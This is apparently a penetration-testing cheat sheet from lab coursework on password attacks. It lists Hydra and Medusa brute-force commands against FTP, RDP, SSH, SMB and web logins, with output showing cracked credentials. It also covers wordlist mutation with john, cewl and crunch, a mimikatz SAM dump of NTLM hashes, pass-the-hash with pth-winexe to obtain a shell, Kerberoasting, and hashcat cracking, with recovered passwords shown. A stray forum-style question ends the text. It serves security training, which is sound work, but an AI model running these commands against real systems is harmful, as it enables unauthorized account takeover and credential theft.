List1 | list2 | list3 | list4 | list5 |
---|---|---|---|---|
asterisk | icq | oracle-listener | rexec | snmp |
cisco | imap[s] | oracle-sid | rlogin | socks5 |
cisco-enable | irc | pcanywhere | rpcap | ssh |
cvs | ldap2[s] | pcnfs | rsh | sshkey |
firebird | ldap3[-{cram | digest}md5][s] | rtsp | |
ftp[s] | memcached | pop3[s] | s7-300 | teamspeak |
http[s]-{head | get | post} | mongodb | postgres |
http[s]-{get | post}-form | mssql | radmin2 | smb |
http-proxy | mysql | rdp | smtp[s] | vnc |
http-proxy-urlenum | nntp | redis | smtp-enum |
hydra -s 5900 -P /usr/share/wordlists/rockyou.txt -t 4 10.11.1.73 vnc -V
$ hydra -I -t 10 -l bob -P ftp.txt -vV 192.168.119.152 ftp
Hydra v9.0 (c) 2019 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes.
Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2020-04-10 16:28:34
[WARNING] Restorefile (ignored ...) from a previous session found, to prevent overwriting, ./hydra.restore
[DATA] max 10 tasks per 1 server, overall 10 tasks, 17 login tries (l:1/p:17), ~2 tries per task
[DATA] attacking ftp://192.168.119.152:21/
[VERBOSE] Resolving addresses ... [VERBOSE] resolving done
[ATTEMPT] target 192.168.119.152 - login "bob" - pass "January" - 1 of 17 [child 0] (0/0)
[ATTEMPT] target 192.168.119.152 - login "bob" - pass "February" - 2 of 17 [child 1] (0/0)
[ATTEMPT] target 192.168.119.152 - login "bob" - pass "March" - 3 of 17 [child 2] (0/0)
[ATTEMPT] target 192.168.119.152 - login "bob" - pass "April" - 4 of 17 [child 3] (0/0)
[ATTEMPT] target 192.168.119.152 - login "bob" - pass "May" - 5 of 17 [child 4] (0/0)
[ATTEMPT] target 192.168.119.152 - login "bob" - pass "June" - 6 of 17 [child 5] (0/0)
[ATTEMPT] target 192.168.119.152 - login "bob" - pass "July" - 7 of 17 [child 6] (0/0)
[ATTEMPT] target 192.168.119.152 - login "bob" - pass "August" - 8 of 17 [child 7] (0/0)
[ATTEMPT] target 192.168.119.152 - login "bob" - pass "September" - 9 of 17 [child 8] (0/0)
[ATTEMPT] target 192.168.119.152 - login "bob" - pass "October" - 10 of 17 [child 9] (0/0)
[ATTEMPT] target 192.168.119.152 - login "bob" - pass "November" - 11 of 17 [child 6] (0/0)
[ATTEMPT] target 192.168.119.152 - login "bob" - pass "December" - 12 of 17 [child 5] (0/0)
[ATTEMPT] target 192.168.119.152 - login "bob" - pass "lab" - 13 of 17 [child 8] (0/0)
[ATTEMPT] target 192.168.119.152 - login "bob" - pass "Offsec!" - 14 of 17 [child 3] (0/0)
[ATTEMPT] target 192.168.119.152 - login "bob" - pass "offsec!" - 15 of 17 [child 2] (0/0)
[ATTEMPT] target 192.168.119.152 - login "bob" - pass "lab" - 16 of 17 [child 9] (0/0)
[ATTEMPT] target 192.168.119.152 - login "bob" - pass "bob" - 17 of 17 [child 4] (0/0)
[STATUS] attack finished for 192.168.119.152 (waiting for children to complete tests)
[21][ftp] host: 192.168.119.152 login: bob password: bob
hydra 192.168.152.10 http-form-post \
"/form/frontpage.php:user=admin&pass=^PASS^:INVALID LOGIN" \
-l admin -P /usr/share/wordlists/rockyou.txt -vV -f
hydra -u -L users.txt -P pw.txt 10.11.1.20 ldap2 -t 1
[kali@kali:~/lab/19_password_cracking]$ hydra -t1 -V -f -l admin -P rdp.txt rdp://192.168.152.10
Hydra v9.0 (c) 2019 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes.
Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2020-04-10 15:51:20
[WARNING] the rdp module is experimental. Please test, report - and if possible, fix.
[DATA] max 1 task per 1 server, overall 1 task, 15 login tries (l:1/p:15), ~15 tries per task
[DATA] attacking rdp://192.168.152.10:3389/
[ATTEMPT] target 192.168.152.10 - login "admin" - pass "January" - 1 of 15 [child 0] (0/0)
[ATTEMPT] target 192.168.152.10 - login "admin" - pass "February" - 2 of 15 [child 0] (0/0)
[ATTEMPT] target 192.168.152.10 - login "admin" - pass "March" - 3 of 15 [child 0] (0/0)
[ATTEMPT] target 192.168.152.10 - login "admin" - pass "April" - 4 of 15 [child 0] (0/0)
[ATTEMPT] target 192.168.152.10 - login "admin" - pass "May" - 5 of 15 [child 0] (0/0)
[ATTEMPT] target 192.168.152.10 - login "admin" - pass "June" - 6 of 15 [child 0] (0/0)
[ATTEMPT] target 192.168.152.10 - login "admin" - pass "July" - 7 of 15 [child 0] (0/0)
[ATTEMPT] target 192.168.152.10 - login "admin" - pass "August" - 8 of 15 [child 0] (0/0)
[ATTEMPT] target 192.168.152.10 - login "admin" - pass "September" - 9 of 15 [child 0] (0/0)
[ATTEMPT] target 192.168.152.10 - login "admin" - pass "October" - 10 of 15 [child 0] (0/0)
[ATTEMPT] target 192.168.152.10 - login "admin" - pass "November" - 11 of 15 [child 0] (0/0)
[ATTEMPT] target 192.168.152.10 - login "admin" - pass "December" - 12 of 15 [child 0] (0/0)
[ATTEMPT] target 192.168.152.10 - login "admin" - pass "lab" - 13 of 15 [child 0] (0/0)
[ATTEMPT] target 192.168.152.10 - login "admin" - pass "Offsec!" - 14 of 15 [child 0] (0/0)
[3389][rdp] host: 192.168.152.10 login: admin password: Offsec!
[STATUS] attack finished for 192.168.152.10 (valid pair found)
1 of 1 target successfully completed, 1 valid password found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2020-04-10 15:51:24
[kali@kali:~/lab/19_password_cracking]$ hydra -l student -P ssh.txt ssh://192.168.152.44
Hydra v9.0 (c) 2019 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes.
Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2020-04-10 15:52:54
[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4
[DATA] max 16 tasks per 1 server, overall 16 tasks, 16 login tries (l:1/p:16), ~1 try per task
[DATA] attacking ssh://192.168.152.44:22/
[22][ssh] host: 192.168.152.44 login: student password: lab
[22][ssh] host: 192.168.152.44 login: student password: lab
1 of 1 target successfully completed, 2 valid passwords found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2020-04-10 15:52:58
[kali@kali:~/lab/19_password_cracking]$
This is a speedy, parallel, modular, login bruter forcer.
Supported Modules:
$ medusa -d
Medusa v2.2 [http://www.foofus.net] (C) JoMo-Kun / Foofus Networks <[email protected]>
Available modules in "." :
Available modules in "/usr/lib/x86_64-linux-gnu/medusa/modules" :
+ cvs.mod : Brute force module for CVS sessions : version 2.0
+ ftp.mod : Brute force module for FTP/FTPS sessions : version 2.1
+ http.mod : Brute force module for HTTP : version 2.1
+ imap.mod : Brute force module for IMAP sessions : version 2.0
+ mssql.mod : Brute force module for M$-SQL sessions : version 2.0
+ mysql.mod : Brute force module for MySQL sessions : version 2.0
+ nntp.mod : Brute force module for NNTP sessions : version 2.0
+ pcanywhere.mod : Brute force module for PcAnywhere sessions : version 2.0
+ pop3.mod : Brute force module for POP3 sessions : version 2.0
+ postgres.mod : Brute force module for PostgreSQL sessions : version 2.0
+ rexec.mod : Brute force module for REXEC sessions : version 2.0
+ rlogin.mod : Brute force module for RLOGIN sessions : version 2.0
+ rsh.mod : Brute force module for RSH sessions : version 2.0
+ smbnt.mod : Brute force module for SMB (LM/NTLM/LMv2/NTLMv2) sessions : version 2.1
+ smtp-vrfy.mod : Brute force module for verifying SMTP accounts (VRFY/EXPN/RCPT TO) : version 2.1
+ smtp.mod : Brute force module for SMTP Authentication with TLS : version 2.0
+ snmp.mod : Brute force module for SNMP Community Strings : version 2.1
+ ssh.mod : Brute force module for SSH v2 sessions : version 2.1
+ svn.mod : Brute force module for Subversion sessions : version 2.1
+ telnet.mod : Brute force module for telnet sessions : version 2.0
+ vmauthd.mod : Brute force module for the VMware Authentication Daemon : version 2.0
+ vnc.mod : Brute force module for VNC sessions : version 2.1
+ web-form.mod : Brute force module for web forms : version 2.1
+ wrapper.mod : Generic Wrapper Module : version 2.0
In this example we will be trying to crack the password at http://192.168.152.10/admin which uses .htaccess to protect access to the directory for user "admin"
medusa -h 192.168.152.10 -u admin -P /usr/share/wordlists/rockyou.txt -M http -m DIR:/admin
We will be trying to crack the password for user "offsec" with the word list smb.txt
medusa -h 192.168.152.10 -u offsec -P smb.txt -M smbnt
Use cewl to generate wordlists from websites
cewl https://brakertech.com -m 6 -w brakertech-cewl.txt
Let's add two custom rules. The first will append a digit 0-9 to the end of each word, the second will append a double digit to the end of each word.
# append to the end of the [List.Rules:Wordlist] section of /etc/john/john.conf
# Add one number to the end of each pasword
$[0-9]
# Add two numbers to the end of each pasword
$[0-9]$[0-9]
[kali@kali:~/lab/19_password_cracking]$ grep -A 1 "end of each" /etc/john/john.conf
# Add one number to the end of each pasword
$[0-9]
# Add two numbers to the end of each pasword
$[0-9]$[0-9]
Mutate cewl list
john --wordlist=brakertech-cewl.txt --rules --stdout > mutated.txt
Months text file:
[kali@kali:~/lab/19_password_cracking]$ cat months.txt
January
February
March
April
May
June
July
August
September
October
November
December
Mutate it:
john --wordlist=months.txt --rules --stdout > months-mutated.txt; cat months-mutated.txt | sort | uniq > months-mutated-uniq.txt
List the number of lines:
[kali@kali:~/lab/19_password_cracking]$ cat months-mutated-uniq.txt | wc -l
1799
Assume the following pattern:
[Capital Letter] [2 x lower case letters] [2 x special chars] [3 x numeric]
To generate a wordlist that matches our requirements, we will specify a minimum and maximum word length of eight characters (8 8) and describe our rule pattern with:
crunch 8 8 -t ,@@^^%%%
Crunch character sets can be found at:
/usr/share/crunch/charset.lst
To generate a list of words between 4-6 characters that is a mix of upper and lower case:
kali@kali:~$ crunch 4 6 -f /usr/share/crunch/charset.lst mixalpha -o crunch.txt Crunch will now generate the following amount of data: 140712049920 bytes 134193 MB
131 GB
0 TB
0 PB
Crunch will now generate the following number of lines: 20158125312
You can use the hash of the NTLM account to authenticate to systems
C:\Tools\password_attacks>mimikatz.exe
.#####. mimikatz 2.1.1 (x86) built on Mar 25 2018 21:00:57
.## ^ ##. "A La Vie, A L'Amour" - (oe.eo)
## / \ ## /*** Benjamin DELPY `gentilkiwi` ( [email protected] )
## \ / ## > http://blog.gentilkiwi.com/mimikatz
'## v ##' Vincent LE TOUX ( [email protected] )
'#####' > http://pingcastle.com / http://mysmartlogon.com ***/
mimikatz # privilege::debug
Privilege '20' OK
mimikatz # token::elevate
Token Id : 0
User name :
SID name : NT AUTHORITY\SYSTEM
528 {0;000003e7} 1 D 29162 NT AUTHORITY\SYSTEM S-1-5-18 (04g,21p) Primary
-> Impersonated !
* Process Token : {0;000f3d23} 3 D 1256857 CLIENT251\Administrator S-1-5-21-1375711201-1277040102-1320212398-500
(14g,24p) Primary
* Thread Token : {0;000003e7} 1 D 1309568 NT AUTHORITY\SYSTEM S-1-5-18 (04g,21p) Impersonation (Delegation)
mimikatz # lsadump::sam
Domain : CLIENT251
SysKey : 34d76d5474939d8e4eff07823e7691d1
Local SID : S-1-5-21-1375711201-1277040102-1320212398
SAMKey : 0dd784cbffd297eef0b42b099eefe68f
RID : 000001f4 (500)
User : Administrator
Hash NTLM: 2892d26cdf84d7a70e2eb3b9f05c425e
RID : 000001f5 (501)
User : Guest
RID : 000001f7 (503)
User : DefaultAccount
RID : 000001f8 (504)
User : WDAGUtilityAccount
Hash NTLM: 32251211a407adf98000769dc64e3323
RID : 000003e9 (1001)
User : admin
Hash NTLM: 2892d26cdf84d7a70e2eb3b9f05c425e
lm - 0: 30d17563f7974c31af287e692700eb2f
lm - 1: b561d600bb224c9ad172dfc2a05c9457
ntlm- 0: 2892d26cdf84d7a70e2eb3b9f05c425e
ntlm- 1: f5e4cc1e05fcef8d9e751195562308d9
ntlm- 2: 2892d26cdf84d7a70e2eb3b9f05c425e
RID : 000003ea (1002)
User : student
Hash NTLM: 2892d26cdf84d7a70e2eb3b9f05c425e
lm - 0: 782f5478a22d80fe0d941f7c53d6beca
ntlm- 0: 2892d26cdf84d7a70e2eb3b9f05c425e
ntlm- 1: 2892d26cdf84d7a70e2eb3b9f05c425e
RID : 000003eb (1003)
User : offsec
Hash NTLM: 2892d26cdf84d7a70e2eb3b9f05c425e
lm - 0: 61fc5cc76eab45fcf27f8b0c01386132
ntlm- 0: 2892d26cdf84d7a70e2eb3b9f05c425e
mimikatz #
Use pth-winexe to autheticate to the target machine
pth-winexe -U username%ntlm1:ntlm2 //ip_address cmd
pth-winexe -U username%ntlm0:ntlm2 //ip_address cmd
kali@kali:~/lab/19.4.3_PasswordCracking]$ cat hash.txt
admin:2892d26cdf84d7a70e2eb3b9f05c425e
WDAGUtilityAccount:32251211a407adf98000769dc64e3323
[kali@kali:~]$ pth-winexe -U admin%2892d26cdf84d7a70e2eb3b9f05c425e:2892d26cdf84d7a70e2eb3b9f05c425e //192.168.152.10 cmd
E_md4hash wrapper called.
HASH PASS: Substituting user supplied NTLM HASH...
Microsoft Windows [Version 10.0.16299.15]
(c) 2017 Microsoft Corporation. All rights reserved.
C:\Windows\system32>
In order to crack Linxu passwords you need to use the unshadow utility
unshadow passwd-file.txt shadow-file.txt > unshadowed.txt
unshadow passwd shadow > unshadow
john --rules --wordlist=/usr/share/wordlists/rockyou.txt unshadowed.txt
hashcat -m 1800 -a 0 mailman.txt /Passwords/wordlists/* --outfile mailmain.recovered
python3 /pentest/exploitation/impacket/examples/GetUserSPNs.py -request -dc-ip 10.11.1.20 svcorp.com/evan
hashcat -a 0 -m 13100 svcorp-kerb.txt /Passwords/wordlists/rockyou.txt
$ cat hash.txt
admin:2892d26cdf84d7a70e2eb3b9f05c425e
WDAGUtilityAccount:32251211a407adf98000769dc64e3323
$ sudo john hash.txt --format=NT
john --wordlist=/usr/share/wordlists/rockyou.txt hash.txt --format=NT
john --rules --wordlist=/usr/share/wordlists/rockyou.txt unshadowed.txt
Exmaple hash
bob:$1$2Wf/hKQd$tV9MM3Qd0Y88GvsDfVvHL0:500:500::/home/bob:/bin/bash
hashcat -m 500 -a 0 tophat.txt /Passwords/wordlists/rockyou.txt
john --rules --wordlist=/usr/share/wordlists/rockyou.txt hash.txt --format=NT
python kirbi2john.py /home/kali/ktickets/[email protected]~1433.kirbi
Crack
# john crack_file --wordlist=/usr/share/wordlists/rockyou.txt
Using default input encoding: UTF-8
Loaded 1 password hash (krb5asrep, Kerberos 5 AS-REP etype 17/18/23 [MD4 HMAC-MD5 RC4 / PBKDF2 HMAC-SHA1 AES 256/256 AVX2 8x])
Will run 3 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
Administrator:500:aad3b435b51404eeaad3b435b51404ee:a8c8b7a37513b7eb9308952b814b522b:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
HelpAssistant:1000:05fa67eaec4d789ec4bd52f48e5a6b28:2733cdb0d8a1fec3f976f3b8ad1deeef:::
SUPPORT_388945a0:1002:aad3b435b51404eeaad3b435b51404ee:0f7a50dd4b95cec4c1dea566f820f4e7:::
alice:1004:aad3b435b51404eeaad3b435b51404ee:b74242f37e47371aff835a6ebcac4ffe:::
kali:1007:aad3b435b51404eeaad3b435b51404ee:fe0bd4e2285afa2676815126dee2f671:::
hashcat --force -m 1000 ntlm.txt /Passwords/wordlists/rockyou.txt
hashcat --force -m 1000 -r /usr/share/hashcat/rules/best64.rule ntlm.txt /Passwords/wordlists/rockyou.txt --outfile alice.recovered
hashcat --username --show -m 1000 -a 0 disco.txt /Passwords/wordlists/rockyou.txt --outfile disco.recovered
kali:fe0bd4e2285afa2676815126dee2f671:kalikali
Guest:31d6cfe0d16ae931b73c59d7e0c089c0:
tood:9a82672679eba04f060863e3dcff7ec7:SPRINGFIELD
mark:bcd477bfdb45435a34c6a38403ca4364:1985
lisa:9c1a294eacb2256b85d8aaba29cfa8f8:BART
ned:40506e34f25e9a8e63ebb95a71afa46a:FLANDERS
david:1fbff38cae51e9918da1fec572f03e11:012345
lee:fc12c395f8f4f7b164b874b9a295f18e:CHEESE
alice:37bcb18eea49b1c09efcfdd9909fcb3a:QWERTY
john:c420ab2599dff2c51e5086c05feb710b:PASSWORD1
homer:8ca881aabea06ef2406acfe38e841b1a:HOMER1
root@crackstation:/labs/alice]# cat alice.recovered
31d6cfe0d16ae931b73c59d7e0c089c0:
fe0bd4e2285afa2676815126dee2f671:kalikali
b74242f37e47371aff835a6ebcac4ffe:aliceishere
sed -i 's/\$krb5tgs\$\(.*\):\(.*\)/\$krb5tgs\$23\$\*\1\*\$\2/' crack_file
hashcat -m 13100 -a 0 crack_file /opt/wordlists/Passwords/*.txt
hashcat -m 13100 -a 3 crack_file /opt/hashcat-5.1.0/masks/rockyou-1-60.hcmask
Use the --increment flag
# kerberos shown
hashcat -m 13100 -a 3 --increment crack_file /opt/hashcat-5.1.0/masks/8char-1l-1u-1d-1s-compliant.hcmask
ok well finally understood hashcat can crack only hashes & nt usernames or passwords..atleast let me nw hw do i apply PIPE on hydra